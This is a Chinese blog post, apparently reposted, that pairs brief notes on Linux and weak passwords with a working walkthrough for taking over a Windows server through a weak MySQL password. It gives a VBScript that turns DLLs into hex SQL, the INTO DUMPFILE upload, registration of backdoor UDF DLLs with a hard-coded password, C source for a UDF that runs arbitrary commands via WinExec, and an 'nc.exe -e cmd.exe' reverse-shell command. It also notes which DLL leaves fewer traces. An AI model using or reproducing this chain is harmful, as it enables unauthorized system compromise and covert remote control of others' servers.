Linux以及弱口令，大佬勿喷

1.什么是linux?

Linux是一套免费使用和自由传播的类Unix操作系统，是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。它支持32位和64位硬件。Linux继承了Unix以网络为核心的设计思想，是一个性能稳定的多用户网络操作系统。『个人比较喜欢linux』

 

2.怎么安装linux?

一、下载Ubutu的linux系统，这里就不给网址了，大家自己搜索吧。

二、注意自己的操作系统是32位还是64位，需要下载相应的版本哟。

三、下载完后，解压到一个空盘里面，找到exe文件打开。

四、弹出对话框。

五、注意选择安装路径。

六、点击安装，OK啦！

 

3.什么是弱口令?

弱口令(weak password) 没有严格和准确的定义，通常认为容易被别人（他们有可能对你很了解）猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令，例如“123”、“abc”等，因为这样的口令很容易被别人破解，从而使用户的计算机面临风险。

 

4.如何通过Mysql弱口令得到系统权限?

首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DLL中自写的Function函数，而执行任意命令。 

 

思路很简单，网上也有一些教程，但是他们要么没有给具体的代码，要么一句话代过，搞得象我似得小菜很难理解，终于在我付出了几天得不断测试得辛勤劳动后，有了点结果，我把详细过程和相关代码得交给大家，这样大家就可以自己写dll文件，自己生成不同文件得二进制码啦！ 

下面，我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码（网友Mix用的方法）： 

set @a = concat('',0x0123abc1312389…..); 

set @a = concat(@a,0x4658978abc545e……); 

…………………. 

 

create table Mix(data LONGBLOB);//建表Mix,字段为data，类型为longblob 

insert into Mix values("");update Mix set data = @a;//@a插入表Mix 

select data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件 

前两句很熟悉把，这个就是我们以前注入的时候，绕过’的解决办法，把代码的16进制数声明给一个变量，然后导入这个变量就行了。只不过这里，因为16进制代码是一个文件的内容，代码太长了，所以就用了concat函数不断把上次得代码类加起来，这样不断累计到一个变量a中。后面几句就很简单了，我都有注释。 

 

后面三句好说，但是前面的那么多16进制数据，手工的话，累人啊！不过你还记得以前有一个exe2bat.vbs脚本吗？这次我们可以把这个脚本修改一下后，得到我们这里需要得mysql脚本！对比exe2bat.vbs生成得文件和我们需要脚本的文件格式，我们可以轻松的得到我们所需的脚本。脚本内容如下： 

fp=wscript.arguments(0 

fn=right(fp,len(fp)-instrrev(fp,"\")) 

with createobject("adodb.stream") 

.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str) 

end with 

sll=sl mod 65536:slh=sl\65536 

with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x" 

for i=1 to sl 

bt=ascb(midb(str,i,1)) 

if bt<16 then .write "0" 

.write hex(bt) 

if i mod 128=0 then .write ");" vbcrlf "set @a = concat(@a,0x" 

next 

end with 

好了，现在只要你把所要上传的文件拖到这个脚本图标上面，就可以生成一个同名的txt文件了。这个txt文件，就是我们所需要的mysql脚本，当然我们还需要修改一下这个txt文件（毕竟他是我们偷工减料得来的！），把最后一行生成的多余的那句“set @a = concat('',0x”删除了，加上建表，插值得那三句代码即可！ 

 

脚本生成了，如何上传？先登陆mysql服务器： 

C:\>mysql –u root –h hostip –p 

Mysql>use mysql; //先进入mysql默认得数据库，否则你下一步的表将不知道属于哪个库 

Mysql>\. E:\*.dll.txt; //这儿就是你生成的mysql脚本 

按照上面输入命令，就可以看见屏幕文字飞快闪烁（当然网速要快啦），不一会你的文件旧上传完毕了！ 

 

下面到达我们的重点，我们上传什么dll文件？就目前我再网上看到的有两个已经写好的dll文件，一个是Mix写得mix.dll，一个是envymask写得my_udf.dll,这两个我都用过，都很不错，但是都也有点不足。先来看看具体的使用过程吧！ 

先用mix.dll: 

登陆mysql,输入命令： 

Mysql> \. e:\mix.dll.txt; 

Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll'; 

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数，我们将要用他执行系统命令！ 

Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口 

过一会儿，你监听8080端口的nc，就会得到一个系统权限的shell了！如图1： 

 

这个的确不错，通过反弹得到得shell可以传过一些防火墙，可惜的是，它的这个函数没有写得很好，只能执行一次，当你第二次连接数据库后，再次运行“select Mixconnect('你的ip','8080');”的时候，对方的mysql会当掉！报错，然后服务停止！ 

所以，使用mix.dll你只有一次成功，没有再来一次的机会！另外根据我的测试，他对Win2003的系统好像不起作用。 

再用my_udf.dll： 

Mysql>\. C:\my_udf.dll.txt 

Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll'; 

//同样地，my_udfdoor也是我们注册后，用来执行系统命令得函数 

Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数，相当于我们只是要激活这个函数 

好了，现在你可以不用关这个shell了，我们再开一个cmd，使用： 

D:\>nc hostip 3306 

* 

4.0.*-nt x$Eo~MCG f**k //看到这个后，输入“f**k” ,他是my_udfdoor默认密码，自己无法更改 

过一会儿，你就有了系统权限的shell了， 

由于他是hook recv版，所以穿墙的能力很强，我是在上一个mix.dll反弹失败的情况下，才使用这个得，他果然不负所望！进系统后，发现它有双网卡，天网防火墙个人版V2.73，对外仅仅开放3306端口，由此可见，my_udf.dll确实有很强的穿透防火墙得能力！但是他也有一个bug,就是再我们连接激活这个函数后（就是使用了命令“select my_udfdoor('’);”后），不管你是否连接，只要执行了: 

Mysql>drop function my_udfdoor; 后，mysql也汇报错，然后挂掉， 

 

所以，你使用这个dll文件无法删除你的痕迹！ 

最后，然我们自己写一个自定义的dll文件。看能不能解决问题。 

我们仅仅使用mysql 得udf的示例作模版即可！看他的示例： 

#include <stdlib.h> 

#include <winsock.h> 

#include <mysql.h> 

extern "C" { 

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, 

 

char *error); 

// 兼容C 

} 

char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, 

 

char *error) 

{ 

char * me = "my name"; 

return me; 

// 调用此UDF将返回 my name 

} 

十分简单吧？好，我们只需要稍微改一下就可以有了自己的dll文件了： 

下面是我的一个哥们Crackme是修改的： 

#include <stdlib.h> 

#include <windows.h> 

#include "mysql.h" 

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名，你可以任意修改 

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改！ 

{ 

char me[256] = {0}; 

if (args->arg_count == 1){ 

strncpy(me,args->args[0],args->lengths[0]); 

me[args->lengths[0]]='\0'; 

WinExec(me,SW_HIDE); //就是用它来执行任意命令 

}else 

strcpy(me,"do nonthing.\n"); 

return me; 

} 

好，我们编译成sysudf.dll文件就可以了！我们来用他实验一把！ 

看操作： 

Mysql>\. C:\sysudf.dll.txt 

Mysql>Create function sys_name returns string soname 'C:\\windows\\sysudf.dll'; 

Mysql>\. Nc.exe.txt //把nc.exe也上传上去 

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080'); 

//sys_name参数只有一个，参数指定要执行的系统命令

好，看看在Win2003中的一个反弹shell了， 

当然，我们你也可以不反弹shell了，而去执行其他命令，只不过不论是否执行成功，都没有回显，所以要保证命令格式正确。对于这个dll文件，经过测试，不论何时“drop function sys_name;”，都是不会报错的，同时也可以多次运行不同命令。至于他的缺点，就是他的穿墙能力跟Mix.dll一样不算太强，但对于实在穿不透的墙，直接运行其他命令就是最好的选择了。 

 

上面三个dll文件可谓各有所短，如何选择，就看你遇到的实际情况了。 

 

好了，从脚本得编写使用到dll文件编写使用，说了这么多，现在大家应该都会了吧？题目说的是弱口令得到系统权限，但是如果你在注入等其他过程中，爆出了config.php中的mysql密码，不也是可以使用的吗？这样我们岂不是也找到继Serv-u后又一大提权方法了吗？

转载于:https://www.cnblogs.com/lenggu/p/7467156.html